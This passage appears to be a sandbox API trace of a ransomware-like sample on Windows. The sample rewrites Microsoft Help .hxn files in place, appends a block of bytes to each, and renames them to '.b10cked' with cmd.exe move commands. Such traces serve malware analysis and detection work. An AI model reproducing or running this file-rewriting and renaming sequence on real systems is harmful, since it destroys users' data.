hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x15e [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.041] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.041] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0198.042] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.042] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0198.042] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0198.042] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0198.042] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0198.042] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0198.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0198.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x132f75c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSPUB.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0198.050] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x15e [0198.050] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.051] CloseHandle (hObject=0x120) returned 1 [0198.056] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN") returned 0x27 [0198.059] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.059] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xda4, dwThreadId=0xc78)) returned 1 [0198.102] CloseHandle (hObject=0x1b4) returned 1 [0198.102] CloseHandle (hObject=0x120) returned 1 [0198.102] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.102] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.102] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.102] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.102] ReleaseMutex (hMutex=0xf8) returned 1 [0198.102] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.102] ReleaseMutex (hMutex=0xf8) returned 1 [0198.102] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.102] ReleaseMutex (hMutex=0xf8) returned 1 [0198.102] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.103] ReleaseMutex (hMutex=0xf8) returned 1 [0198.103] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.103] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25489262330) returned 1 [0198.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.103] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x14c [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.104] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.105] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x14c [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x14c [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x14c [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.106] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.106] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa5, lpOverlapped=0x0) returned 1 [0198.111] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.112] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa5, lpOverlapped=0x0) returned 1 [0198.112] SetFilePointer (in: hFile=0x120, lDistanceToMove=-165, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa7 [0198.113] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa5, lpOverlapped=0x0) returned 1 [0198.113] SetFilePointer (in: hFile=0x120, lDistanceToMove=-165, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa7 [0198.113] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa5, lpOverlapped=0x0) returned 1 [0198.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSTORE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSTORE.14.1033.hxn", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSTORE.14.1033.hxn", lpUsedDefaultChar=0x0) returned 21 [0198.120] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x14c [0198.120] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.127] CloseHandle (hObject=0x120) returned 1 [0198.140] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.MSTORE.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN") returned 0x27 [0198.169] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.170] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd20, dwThreadId=0xd54)) returned 1 [0198.368] CloseHandle (hObject=0x1b4) returned 1 [0198.368] CloseHandle (hObject=0x120) returned 1 [0198.368] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.368] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.368] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.368] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.368] ReleaseMutex (hMutex=0xf8) returned 1 [0198.368] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.368] ReleaseMutex (hMutex=0xf8) returned 1 [0198.368] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.368] ReleaseMutex (hMutex=0xf8) returned 1 [0198.368] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.368] ReleaseMutex (hMutex=0xf8) returned 1 [0198.369] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25515922877) returned 1 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x13a [0198.370] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13a [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.371] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x13a [0198.372] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 